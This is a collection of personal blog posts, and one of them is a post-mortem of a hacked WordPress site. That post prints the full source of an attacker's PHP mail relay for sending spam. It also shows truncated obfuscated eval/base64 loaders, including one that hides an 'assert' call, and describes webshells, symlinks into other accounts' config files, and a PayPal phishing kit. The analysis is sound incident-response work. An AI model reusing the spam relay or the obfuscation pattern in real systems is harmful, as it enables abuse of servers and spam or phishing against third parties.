somewhere to talk about random ideas and projects like everyone else

stuff

#meta

Blog Reboot 11 April 2015

this blog

This is my submission to blogdom’s burgeoning class of eternally “work in progress” sites. I’ve been working on this blog reboot for nearly a year at this point (rest assured, I haven’t worked on it for any appreciable fraction of that time— but it’s nonetheless traumatizing for me as “blog posts written” is my primary metric for personal productivity).

There’s still a lot left to be done, but right now it should be in a more or less functional and navigable state. I’ve just added image thumbnailing (so this homepage shouldn’t take a triassic aeon to load anymore), which seems like an addition substantial-enough to warrant some new words adorning the featured post callout.

Most importantly though, it’s now a hip static site hosted on Github Pages (though I might move to S3), so the Turkish phishers last remaining venue for hijacking this site may be sending a pull request.

Getting Hacked

I don’t generally pay a lot of attention to this blog— especially during the beginning of every month. I used to generally hold myself to a rule that I would post something new at least once a month, but that policy kept slipping and then there was a mad dash to finish some blog post the first or second day of each new month to be retroactively timestamped.

Anyway, point is that I didn’t notice when the site got hacked for a few days. Unfortunately I don’t have any screenshots of what the site looked like when it was hacked. And at this point I can’t promise you that my mental model of what it looked like is anything more than a hallucination.

It’s a bit of an interesting chapter in my blog’s history, so I’ve spun off this section into its own post.

First Sketches

I guess it makes a reasonable amount of sense to write about how this site works. This is the first incarnation of the blog which is to any appreciable extent aesthetically original. It isn’t the default theme of JupiterCMS, PHPFusion, nor is it a free template for Wordpress.

It’s a pretty simple design, and it’s pretty nifty that in this day and age, a design which is sparse by ignorance is indestinguishable from a good design which is sparse by (uh) design. There isn’t much besides the simple arrangement of rectangles and lines and it relies pretty heavily on typography and whitespace to delimit sections.

At around the same time my blog stopped working, I came into the posession of a Moleskine. On June 14th, apparently, I started my first sketch of what my blog might be like.

In retrospect, it didn’t really look very coherent and I have literally no idea what I was trying to do at the time. But one of the motivations behind the entire endeavor was to strike a sort of balance between a blog and a portfolio. I like the idea of documenting the process of things and writing some part of the though process a somewhat non-abbreviated form. But one thing that I noticed is that a blog is a terrible means of surfacing older content, and I think a lot of the interesting ideas I’ve explored are the ones which I played around with several years ago.

On the other spectrum, I didn’t want to go too far in the direction of summary. I didn’t quite want it to be simply a résumé where I condense every endeavor into two buzzword-packed sentences which summarize the little iota of cleverness imbued in the project.

And so the motivation of the design was finding some way to hybridize the two goals— summary and process.

I found another sketch in my Moleskine dated June 24th, which seems to be a bit more coherent. On the right you can see some blocks and lines which, while not having much bearing on the current site design, at least seem like they might pass a Turing test criterion for sufficiently-websiteish website.

One thing that I noticed is that the sequence of my projects tends to be pretty structured. Over the years, I tend to explore little ideas which tend to culminate into singular projects— or alternatively, I build a larger project and spin off smaller components. All of this tends to happen over a relatively short time period (a few months to a year).

So in terms of a projects list, this means that I can introduce a bit of an aesthetic cadence where a series of minor projects are occasionally punctuated by larger projects. And because of this natural faux-hierarchy there’s a natural clustering which is generally both temporal and subjective. The short projects have single-sentence summaries, whereas the larger projects can have a paragraph worth of elaboration.

Naturally, all the project descriptions are hyperlinked and lead to a project page which includes all the blog posts documenting the process of creating that particular project.

New Tools

At some point I helped design a mobile app and ended up getting reasonably familiar with Adobe Illustrator.

It was also at this time that I started using tools that designers use— things like Adobe Illustrator and Bohemian Coding’s Sketch.


Blog Hacked 07 June 2014

I don't actually understand what the units of the Y axis are

Well, so my blog got hacked. Even more unfortunate is that I can’t seem to locate any trace of what it looked like when it was hacked. I guess that’s the problem when you write a post-mortem literally a year after the original incident.

All that’s left is some eerie hints that something happened.

My blog was averaging around 350MB of bandwidth per day, when suddenly on June 6th, it started to spike. In fact, between June 6th and 7th, it used a total of over 40GB of bandwidth. It had eaten through my entire monthly bandwidth quota.

At 6:48pm on June 7th, I had discovered that something was going on with my blog and started the process of fixing it. I looked through some of the access logs and saw a particular abundance of a strange file pffam.php

91.234.164.143 - - [07/Jun/2014:05:07:18 -0400] "POST /wp/wp-content/themes/carrington-woot/pffam.php HTTP/1.1" 500 7309 "-" "Mozilla/3.0 (compatible; Indy Library)"
78.26.204.99 - - [07/Jun/2014:05:07:19 -0400] "POST /wp/wp-content/themes/carrington-woot/pffam.php HTTP/1.1" 500 7309 "-" "Mozilla/3.0 (compatible; Indy Library)"
46.173.111.151 - - [07/Jun/2014:05:07:21 -0400] "POST /wp/wp-content/themes/carrington-woot/pffam.php HTTP/1.1" 500 7309 "-" "Mozilla/3.0 (compatible; Indy Library)"

Presumably pffam.php was the bit of malicious code which was injected onto my server, acting as a nice endpoint for recieving and executing particular actions. It seems that Indy Library is some sort of .NET library which implements HTTP.

It’s interesting that the endpoint is being hit by multiple IP addresses, and they all seem to geolocate to Eastern European countries. Presumably they’ve built some sort of graphical Command & Control panel out of Visual Basic or something.

Unfortunately, it looks like I replaced the entire wordpress installation with an older backup— so I don’t actually have any copies of pffam.php. But it managed to use 40GB of bandwidth, and hackers are hardly keen on keeping all their eggs in one bucket, so surely there must have been other endpoints— right?

Sure enough, there’s another endpoint:

109.87.224.22 - - [06/Jun/2014:21:18:06 -0400] "POST /ajaxanimator/stick2-old/jsgif/Demos/dswbk.php HTTP/1.1" 200 4 "-" "Mozilla/3.0 (compatible; Indy Library)"

And it looks like it was buried underneath enough files that I hadn’t noticed and deleted it— woot? In fact there’s actually a number of fascinating files and folders in that directory

├── IT2_9z38yd
├── PwdbqQ3nh0
├── SLn30gBqqv
├── SPIFBSYgsr
├── UXLPRmw9YY
├── XviRYdmJ4H
├── baZn0aynkw
├── bosa.php
├── dibdt.php
├── dswbk.php
├── fr1.php
├── hummjvq.php
├── ptRiJiayze
│   ├── VjQauM_3Ev
│   │   ├── btn_bg_sprite.gif
│   │   ├── cv_amex_card.gif
│   │   ├── cv_card.gif
│   │   ├── de-security-hero.png
│   │   ├── form.css
│   │   ├── form.dat
│   │   ├── form.php
│   │   ├── help.jpg
│   │   ├── help2.html
│   │   ├── hr-gradient-sprite.png
│   │   ├── ie6.css
│   │   ├── ie7.css
│   │   ├── ie8.css
│   │   ├── index.css
│   │   ├── index.dat
│   │   ├── index.php
│   │   ├── interior-gradient-bottom.png
│   │   ├── interior-gradient-top.png
│   │   ├── jquery.creditCardValidator.js
│   │   ├── jquery.min.js
│   │   ├── jquery.validationEngine-de.js
│   │   ├── jquery.validationEngine.js
│   │   ├── leftknob.png
│   │   ├── loading.css
│   │   ├── loading.php
│   │   ├── logo_paypal_106x29.png
│   │   ├── mid.swf
│   │   ├── midopt.swf
│   │   ├── mini_cvv2.gif
│   │   ├── nav_sprite.gif
│   │   ├── paypal_logo.gif
│   │   ├── pp_favicon_x.ico
│   │   ├── scr_arrow_4x6.gif
│   │   ├── scr_backgradient_1x250.gif
│   │   ├── scr_content-bkgd.png
│   │   ├── scr_gray-bkgd.png
│   │   ├── scr_gray-bkgd_001.png
│   │   ├── secure_lock_2.gif
│   │   ├── sprite_flag_22x16.png
│   │   ├── sprite_header_footer_94.png
│   │   ├── sprite_ia.png
│   │   ├── sprite_ia_001.png
│   │   ├── validationEngine.jquery.css
│   │   ├── verify
│   │   └── vertical-gradient-sprite.png
│   └── verification
├── sthy.php
├── vlizzvij.php
├── x4MslaR1CW
│   ├── BN3R5U8sF5
│   │   ├── btn_bg_sprite.gif
│   │   ├── cv_amex_card.gif
│   │   ├── cv_card.gif
│   │   ├── de-security-hero.png
│   │   ├── form.css
│   │   ├── form.dat
│   │   ├── form.php
│   │   ├── help.jpg
│   │   ├── help2.html
│   │   ├── hr-gradient-sprite.png
│   │   ├── ie6.css
│   │   ├── ie7.css
│   │   ├── ie8.css
│   │   ├── index.css
│   │   ├── index.dat
│   │   ├── index.php
│   │   ├── interior-gradient-bottom.png
│   │   ├── interior-gradient-top.png
│   │   ├── jquery.creditCardValidator.js
│   │   ├── jquery.min.js
│   │   ├── jquery.validationEngine-de.js
│   │   ├── jquery.validationEngine.js
│   │   ├── leftknob.png
│   │   ├── loading.css
│   │   ├── loading.php
│   │   ├── logo_paypal_106x29.png
│   │   ├── mid.swf
│   │   ├── midopt.swf
│   │   ├── mini_cvv2.gif
│   │   ├── nav_sprite.gif
│   │   ├── paypal_logo.gif
│   │   ├── pp_favicon_x.ico
│   │   ├── scr_arrow_4x6.gif
│   │   ├── scr_backgradient_1x250.gif
│   │   ├── scr_content-bkgd.png
│   │   ├── scr_gray-bkgd.png
│   │   ├── scr_gray-bkgd_001.png
│   │   ├── secure_lock_2.gif
│   │   ├── sprite_flag_22x16.png
│   │   ├── sprite_header_footer_94.png
│   │   ├── sprite_ia.png
│   │   ├── sprite_ia_001.png
│   │   ├── validationEngine.jquery.css
│   │   ├── verify
│   │   └── vertical-gradient-sprite.png
│   └── verification
├── xstyles.php
└── yl27ceCuPh

So it looks like most of these folders are actually empty, and a lot of the rest of the top level PHP files are the same.

It seems that bosa.php, dibdt.php, dswbk.php, hummjvq.php, sthy.php, and vlizzvij.php are identical.

<?php
$to      = stripslashes($_POST["to_address"]);
$BCC      = stripslashes($_POST["BCC"]);
$subject = stripslashes($_POST["subject"]);
$message = stripslashes($_POST["body"]);
$from_address = stripslashes($_POST["from_address"]);
$from_name = stripslashes($_POST["from_name"]); 
$contenttype = $_POST["type"];


if (strlen($from_address) > 3)
{
$header = "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .=  "From: $from_name <$from_address>\r\n";
$header .=  "Reply-To: $from_name <$from_address>\r\n";
$header .= "Subject: $subject\r\n";

$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));
}
else
{
$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message));
}




if($result)
{
echo 'good';
}
else
{
    'error : '.$result;
}
?>

I’m guessing that it’s being used to send spam messages to different people using the PHP mail() function.


More interesting is fr1.php, which is obfuscated as a giant base 64 encoded gzipped string.

eval(gzinflate(base64_decode('HZzHkoTKkkQ/591r...h/Pp/jc/L/+59///33f/4f')));

So to see what went inside, I stuck it in a different file and replaced the eval with echo. The first time I ran it, I had a bit of a double take because the result looked like this:

eval(gzinflate(base64_decode('FZ23kuNKtkU/Z+4NGN...gRP6r//+ffff//v/wE=')));

And if two times isn’t sufficiently meta, this happens a third

eval(gzinflate(base64_decode('FZy3buRaFkU/Z94DA3q...GAfkEQPM8TBK/yP//+++9//w8=')));

A fourth…

eval(gzinflate(base64_decode('HZ3HkqPqlkYf554TDPAuO...7fM8QRAFr//+9z///vvv//wf')));

fifth…

eval(gzinflate(base64_decode('FZzHjuNaskU/p+8FB/...qAgCFAAAIIgiYKX8N///Pvvv//3/w==')));

sixth…

eval(gzinflate(base64_decode('FZzHbuvKtkU/554...L63//+8++///73/wE=')));

seventh…

echo(gzinflate(base64_decode('FZ3HbuRKEkU/Z94...4nCAI0SDH/+ffff//7fw==')));

Actually, it goes on 40 more times, like a demented matroyshka doll. It’s not UTF-8 encoded, so I had to guess a handful of encodings before discovering that it was what Sublime Text calls “Cyrillic (Windows 1251)”. It’s 1500 lines, so I’ve posted it in a Gist rather than sticking it inline here.

I skimmed through the code and it seemed relatively safe— or at least it didn’t seem to plant any rootkits or start any persistent processes. So I ran it and got a screenshot. It seems to call itself “C99madShell v. 3.0 BLOG edition.php”

WebShell


The other distinct file, xstyles.php seems to be a little more unique.

<?php 

$n = 'ss';
$r ="rt";
$a = "a";
$y='e';
$q = $a.$n.$y.$r;

$v = '5b17fxo30zD8d/Ip5C3tQoMx4CRXYgx...8B';

@$q("e"."va"."l('\x65\x76\x61\x6c\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x76\x29\x29\x29\x3b');");

So what does it do? Well, the first part basically just assembles q with the value “assert”.

bool assert ( mixed $assertion [, string $description ] )

When PHP’s built-in assert function is passed a string $assertion, it evaluates that string. It’s less known than eval so this is plausibly useful for evading firewalls of a certain sort. So what it finally translates to is:

assert("eval('eval(gzinflate(base64_decode($v)));');")

The decoded file starts out like this:

<?php
$auth_pass = "cef26cef9c9fdbdb49363368c8921635";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

I searched around for the password, but nobody’s yet been able to find a matching plaintext. However, along the way I found out about PHPDecoder which would have saved quite a bit of time an hour ago.

This one is also 1500 lines, so I’ve posted it in another Gist. This one looks aesthetically a bit nicer— if it’s not too weird to complement the tools of the people who hacked your website.

WebShell


There’s one (hah, pun not intended) folder entitled 1/ which is particularly interesting. It has three subdirectories: configweb, sym, and tumdizin.

Configweb seems to be a directory filled with symlinks to 9414 distinct configuration files, each of them residing on someone else’s home directory. It encompasses lots of different software packages including Joomla, Wordpress, Zencart, SMF, WHM, OSCommerce, VBulletin and ore.

The directory sym seems to just contain a symlink entitled root to— you guessed it— /.

And finally tumdizin seems to link to the web roots of 116 distinct shared hosting accounts which happen to reside on the same server.


There’s also that folders which blow up in the tree x4MslaR1CW, and ptRiJiayze. You can probably guess by files like logo_paypal_106x29.png that this site got turned essentially into a phishing website for Paypal. I’m actually rather amazed that the result looks so plausible.


However, it seems that there was some weird activity going on starting a few days before the massive traffic. There’s an error_log file which seems to grow pretty slowly in general. There was a fairly large stretch from January to June with no errors— and then it seemed to constantly encounter these errors leading up to the traffic spike.

[03-Jun-2014 17:06:05 UTC] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/antimatt/public_html/wp/wp-rss.php(1) : eval()'d code:1) in /home/antimatt/public_html/wp/wp-includes/pluggable.php on line 1121
[04-Jun-2014 19:31:54 UTC] PHP Warning:  include(images/settings.php): failed to open stream: No such file or directory in /home/antimatt/public_html/wp/wp-content/themes/carrington-woot/footer.php on line 24
[04-Jun-2014 19:31:54 UTC] PHP Warning:  include(images/settings.php): failed to open stream: No such file or directory in /home/antimatt/public_html/wp/wp-content/themes/carrington-woot/footer.php on line 24

I ended up downloading a daily backup of the server which was taken before it was hacked (June 1, 2014) and installing it onto a small virtual machine. I downloaded a Wordpress plugin for exporting the entire website as static HTML pages and uploaded it to Github pages. This served as a stop-gap measure for almost an entire year while I was getting the new site to work.

This experience is largely why I decided that this new incarnation would be a static site— essentially free from the perils that come with a dynamic website. It’s not like the old version used dynamic content to much advantage anyway, it was cached enough that it was practically static anyway.


August Progress Report 31 August 2013

It must be infuriating to be in a situation where there’s a clear problem, and all the obvious remedies continually fail to produce any legitimate result. That’s what this blog is like: every month rolls by with some half baked ideas partially implemented and barely documented. And in the last day of the month, there’s a kind of panicked scramble to fulfill an entirely arbitrary self-enforced quota just to convince myself that I’m doing stuff.

Anyway, it’s pretty rare for me to be doing absolutely nothing, but mustering the effort to actually complete a project to an appreciable extent is pretty hard. This might be in some way indicative of a kind of shift in the type of projects that I try to work on- they’re generally somewhat larger in scope or otherwise more experimental. And while I may have been notorious before for not leaving projects at a well documented and completed state, these new ideas often languish much earlier in the development process.

There’s always pressure to present things only when they are complete and presentable, because after all timing is key and nothing can be more detrimental to an idea than ill-timed and poor execution. But at the same time, I think the point of this blog is to create a kind of virtual paper trail of an idea and how it evolves, regardless of whether or not it falters in its birth.

With that said, I’m going to create a somewhat brief list of projects and ideas that I’m currently experimenting with or simply have yet to publish a blog post for.

  • One of the earlier entries of the backlog is a HTML5 scramble with friends clone, acting highly performant on mobile with touch events and CSS animations while supporting keyboard based interaction on desktop. I’ve always been intending to build some kind of multiplayer real time server component so that people could compete in real time. Maybe at some point it’ll be included as a kind of mini game within protobowl.
  • The largest project is definitely Protobowl, which has just recently passed its one year anniversary of sorts. It’s rather odd that it hasn’t formally been given a post on this blog yet, but c’est la vie. Protobowl is hopefully on the verge of a rather large update which will add several oft-requested features, and maybe by then I’ll have completed something which is publishable as a blog post.
  • Font Interpolation/Typeface Gradients. I actually have no idea how long this has been on my todo list (years, no doubt), but the concept is actually rather nifty. With attributes like object size or color, things can be smoothly interpolated in the form of something like a gradient. The analogue for this kind of transition when applied to text would be the ability to type a word whose first letter is in one font, and the last letter being another font, with all the intermediate letters some kind of hybrid. I never did get quite far in successfully implementing it, so it may be a while until this sees the light of day.
  • I’ve always wanted to build a chrome extension with some amount of OCR or text detection capabilities so that people could select text which was embedded within an image as if it weren’t just an image. At one point I narrowed down the scope of this project so that the OCR part wasn’t even that important (the goal was then just some web worker threaded implementation of the stroke width transform algorithm and cleverly drawing some rotated boxes along with mouse movements). I haven’t had too much time to work on this so it hasn’t gone too far, but I do have a somewhat working prototype somewhere. This one too is several years old.
  • In the next few days, I plan on publishing a blog post I’ve been working on which is something of a humorous satire on some of the more controversial issues which have arisen this summer.
  • And there are several projects which have actually gotten blog posts which weren’t themselves formal announcements so much as a written version of my thinking process behind them. I haven’t actually finished the Pedant, in spite of the fact that the hardware is in theoretically something of a functional state (I remember that I built it with the intent that it could be cool to wear around during MIT’s CPW back in April, but classes start in a few days and it hasn’t progressed at all since). Probably one of the most promising ideas is the kind of improved, vectorized and modern approach to video lectures- but that too needs work.
  • I’m building the website for a local charity organization which was started by a childhood friend, and maybe I’ll publish a blog post if that ever gets deployed or something.

hqx.js - pixel art scaling in the browser 31 March 2013

Screenshot 2013-03-31 at 5.15.07 PM

Every once in a while some gadget has the misfortune of epitomizing the next first world problem. I guess right now, this is owning a Retina (or equivalent) laptop, tablet (arguably phone, but most web pages are scaled out so it’s not that big of a problem) and being irked at the prevalence of badly scaled graphics. So there’s a new buzzword “Retina Ready” for websites, layouts and designs which support higher resolution graphics for devices which support it, often meaning of lots of new files and new css rules. It’s this trend of high-pixel-density devices (with devices like the iPad 3, Retina Macbook Pro, Nexus 10 and Chromebook Pixel - though I for one don’t currently have any of them, just this old glitchy-albeit-functional first generation Chromebook) that is driving people to vector icon fonts.

But the problem of radical increases in terms of resolution isn’t a new one. Old arcade games rarely exceeded 260x315, and the Game Boy Color had a paltry 160x144. While a few people still nostalgically lug around game cabinets and dig out their dust-covered childhood handheld consoles for nostalgic sneezing fits, most of the old games are now played with emulators running on systems several orders of magnitude more sophisticated in every imaginable aspect. So that arcade monitor that once could engross a childhood (and maybe early manhood) now appears nothing more than a two inch square on a twenty inch monitor. But luckily there is a surprisingly good solution to all of this in the form of algorithms designed in particular for scaling pixel art.

The most basic form of image scaling that exists is called nearest-neighbor interpolation, which is extra simple for retina devices because it means simply growing the size of each pixel by a factor of two along each axis. That leads to things which are blocky, and unless you’re part of an 8-bit retro-art project with a chiptune soundtrack looks ugly.

The most common form of image scaling borrows a lot from the math and signal processing fields, with names like bilinear, bicubic, and lanzcos essentially they treat an image as some kind of composition of sinusoidal parts and try to ideally extrapolate and interpolate such that visible artifacts are marginalized. It’s all very mathy, but the result is kind of the opposite of nearest-neighbor because it has the tendency to make things blurry and fuzzy.

The thing is that the latter tries to reach some kind of mathematical ideal, because images taken by your friendly neighborhood DSLR-toting amateur (spider-powers optional) are actually samples of real world points of data— so this mathematical pursuit of purity works out very well. There’s still the factor-of-four information-theoretic gap that needs to be filled in with best-guesstimates, but there isn’t really any way to improve the way a photograph is scaled without using a higher-resolution version of said photograph. But most photographs that are taken already are sixteen-megapixel monsters and they usually still look acceptable when upscaled.

The problem arises with pixel art, little icons or buttons which someone painstakingly drew in Photoshop one lazy summer afternoon in the late 90s. They’re everywhere and each pixel isn’t captured and encoded by a sampling algorithm of some analog natural phenomona— each pixel was lovingly crafted and planted by some meticulous artist. There is no underlying analog signal to interpret, it’s a direct perceptual hookup to the mind of the creator— and that’s why bicubic sampling looks especially bad here.

Video games, before 3d graphics engines and math-aware anti-aliasing concerned with murdering jaggies, in the old civilized age of bit-blitting, were mostly constructed out of pixel art. Each color in that limited palette was placed there for a reason and could be exploited by specialized algorithms to construct higher-quality upscaled versions which remained sharp. These come with the names EPX, Scale2x, AdvMAME2x, Eagle, 2×Sal, Super 2×Sal, hqx, and most recently, Kopf-Lischinksi. These algorithms could be applied in real time to emulator windows to acceptably scale a game to new sizes while eschewing jagged corners and blurry edges.

Anyway the cool thing is that you can probably apply these algorithms in lieu of the nearest-neighbor or bilinear scaling algorithms used by browsers on retina platforms to effortlessly upgrade old sites to shiny and smooth. With a few rough heuristics (detect if an image appears to be a sprite by testing for a limited palette, see if the image is small or a perfect square, detect if it has transparent pixels) this could be packed into a simple script include that website makers could easily inject into their pages to automagically upconvert old graphics to new shiny high-resolution ones without having to go through the actual effort of drawing new high resolution graphics and uploading them online. And this could also be packaged as a browser extension so that, once and forever after, this first-world nuisance shall be no more.

Before setting out to port hqx-java to javascript, I actually did some cursory googling to see if it actually had been done before. Midway through writing this post, I found out that it actually had been done before, in a better way, so I won’t even bother linking to my inferior version. But either way the actual goal of this project was the part which was detailed in the last paragraph, that of an embeddable script or browser extension which could heuristically apply pixel-scaling algorithms— something I probably won’t bother trying to do until at least after I get my college laptop (which I anticipate will be a Retina Macbook Pro 15”). Nonetheless, I haven’t written an actual blog post in almost three months and it’s the last day of this month, and I guess it’s better than having you all (though nobody’s probably going to read this now that Google Reader has died) assume that I’ve died. Anyway, now I’m probably going to retroactively publish old blog posts in previous months to fraud continuity.


Meta Analytics 17 August 2012

I’ve been maintaining this blog, or at least the content inside it for about five years now. It’s been through a handful of incarnations, often paired with significant changes in web hosting. I’ve had a blog for a little bit longer, but I don’t think I have the medium figured out. The structure of the posts and the style has changed over the past few years, but I can’t at this point call it evolution, a positive progression. Part of the power which lies in analyzing data is the ability to realize patterns, often at a different scale from human observation (spans of months or years) which are equally if not more insightful.

That’s been my personal attraction to data science. I’ve had a couple of personal experiments involving collecting data about my daily activities, my old writing and code in hopes of distilling the changes that I’m too conceited to admit without the infallible hand of statistics. For nearly two years now, I’ve logged my entire life within precision of approximately 30 minutes from Google Calendar (or the Calendar app on iPad which syncs to Google Calendar). Actually, the label is slightly off, I quite often dedicate large spans of time to more or less useless labels like “not productive”. But this temporal information falls apart in terms of its richness, for my schedule is dictated more so by the mandatory rhythms of school life than the drifting cadence of other behavior.

But I digress. This isn’t about why I collect data so much as “I have this data, now what?”. In this case, I had a hypothesis, a rather simple albeit morbid one at that “my blog is dying”. It’s not hard to see how I’m coming at the conclusion. I’m pretty much struggling at this point to meet my goal of one post per month (itself not a particularly difficult goal, but as time has gone on and my posts have become more infrequent, I feel more compelled to write obscenely long posts to compensate, but of course this also leads to big posts sitting there unfinished for long durations losing the sort of one post = one sitting mentality). But before I ramble for too long, I’ll cut to the chase and answer the question posed at the beginning of this paragraph: “Graphs.” (you could imagine those haunting glyphs levitating in the midst of air caught in the invisible grasp of Giorgio A. Tsoukalos, or better yet, I can spare your cognitive abilities by making it real)

Here’s a pretty little graph I made in R (sorry for the mess on the horizontal axis, and I just realized I have no idea as to how to interpret the dates, I’m assuming that they’re linear and it’s just some odd aliasing issue that makes even-numbered years repeat twice), it’s a histogram of the dates of posts that I’ve made to this blog (extracted with a simple Python script and Wordpress’s built-in Export button).You can probably actually tell that the blog’s demise is quite a long way’s coming. Every annual peak ends up shallower the following year and the first time gaps have actually existed was this fateful year, 2012.

It’s actually sort of interesting that these peaks exist, but I can’t really tell during what months that happened during (since these axes are labeled so terribly, it’d be nice if I knew some nice interactive graph engine that worked with histograms, something like that cool time series viewer that Google had for Finance for like ever but for histograms, but I guess that just shows how much of a non-scientist I am, to have no idea how to fluently articulate in a statistical or graphical language of my choice).

For more graph fun, here’s a scatter plot of word lengths as a function of year. I wasn’t dedicated enough to figure out how to get NLTK to tell me the Gunning-Fog, Flesch-Kincaid or ARI value for individual posts, and I doubt that would end up showing anything particularly insightful. But yeah, so here it is. Charts. Charts of words. Note that thing that sticks out clocking in at around 3724 words is my first Music Alpha post.

Actually, I won’t mind that Wordpress isn’t yet self aware (‘ello Skynet) and still sends trackbacks and pings (whatever they are) to me when I link to myself. Seriously, you don’t actually need to have a self-aware artificial intelligence in order to learn how to not spam me with emails when I’m quite probably as in super definitely aware of its existence. But anyway, I guess I’ll stomach the lurching pain of a thousand emails (I’m using hyperbole here, in case your rudimentary artificial intelligence algorithms can’t quite distinguish them, but I’m also pretty sure your algorithms wouldn’t be able to handle n-th degrees of meta, so this excruciatingly useless parenthetical wouldn’t be much other than that: excruciatingly useless) and post the last part of the list here.

1340133957.0 , 2012-06-19 19:25:57 , 1178 [http://antimatter15.com/wp/2012/06/pinball/](http://antimatter15.com/wp/2012/06/pinball/)

1333025085.0 , 2012-03-29 12:44:45 , 1302 [http://antimatter15.com/wp/2012/03/musicalpha-v2-0/](http://antimatter15.com/wp/2012/03/musicalpha-v2-0/)

1293394934.0 , 2010-12-26 20:22:14 , 1409 [http://antimatter15.com/wp/2010/12/drag2up-v2-drag-and-drop-uploading-for-all-sites/](http://antimatter15.com/wp/2010/12/drag2up-v2-drag-and-drop-uploading-for-all-sites/)

1317686582.0 , 2011-10-04 00:03:02 , 1565 [Haven't actually published this yet, hmm]

1341591648.0 , 2012-07-06 16:20:48 , 2117 [http://antimatter15.com/wp/2012/07/cloudfall-a-text-editor/](http://antimatter15.com/wp/2012/07/cloudfall-a-text-editor/)

1307064165.0 , 2011-06-03 01:22:45 , 2180 [http://antimatter15.com/wp/2011/06/why-the-chrome-web-store-is-bad-for-the-web/](http://antimatter15.com/wp/2011/06/why-the-chrome-web-store-is-bad-for-the-web/)

1277922545.0 , 2010-06-30 18:29:05 , 2319 [http://antimatter15.com/wp/2010/06/wave-embed-api/](http://antimatter15.com/wp/2010/06/wave-embed-api/)

1294958307.0 , 2011-01-13 22:38:27 , 2762 [http://antimatter15.com/wp/2011/01/the-ambiguity-of-open-and-vp8-vs-h-264/](http://antimatter15.com/wp/2011/01/the-ambiguity-of-open-and-vp8-vs-h-264/)

1308832860.0 , 2011-06-23 12:41:00 , 2872 [http://antimatter15.com/wp/2011/06/samsung-series-5-chromebook/](http://antimatter15.com/wp/2011/06/samsung-series-5-chromebook/)

1305426252.0 , 2011-05-15 02:24:12 , 3724 [http://antimatter15.com/wp/2011/05/uploading-mp3s-to-google-music-beta-from-linux-chrome-os-win-and-mac/](http://antimatter15.com/wp/2011/05/uploading-mp3s-to-google-music-beta-from-linux-chrome-os-win-and-mac/)

That list was compiled by the command cat blogtimes.csv | sort -t',' -k3n | tail, and that’s quite an accomplishment because I had to look up the arguments for the sort command in order to figure that out. Of course, blogtimes.csv is the output of my magical six line python script (which uses BeautifulSoup to extract all the wp:post_dates).

So, with 10 blog posts in that list, every single 8 of them happened after 2011 and 3 of them happened in 2012. Considering that there were 10 things published in 2012 (according to my dataset) and 21 in 2011, that’s a rather significant fraction of the stuff which has been written recently to be insanely long.

Wordpress tells me this post is now at 948 words, so I guess I’ll add a bit of concluding at the end to push it over the magical power-of-ten barrier, so presumably you should brace for the terrible boom which occurs at this point (oh, what’s that? I think that’s my imaginary telephone operator who informs me when I make a factual error, apparently those kinds of booms only happen with waves, and apparently words flowing through word count orders of magnitude don’t count).

The original title of this post was “Meta Analytics & Upcoming Changes”, but in the spirit of the upcoming changes, I’ve moved the “Upcoming Changes” part into its own post (tentatively titled “Upcoming Changes”). You can probably at this point guess that “Upcoming Changes” involves something to tackle the excessive verbosity and to mitigate the absurdly infrequent posts. This probably doesn’t sound nearly as heroic to you as it does to me, because I’m listening to The Avengers soundtrack right now, and “A Promise” is pretty dramatic.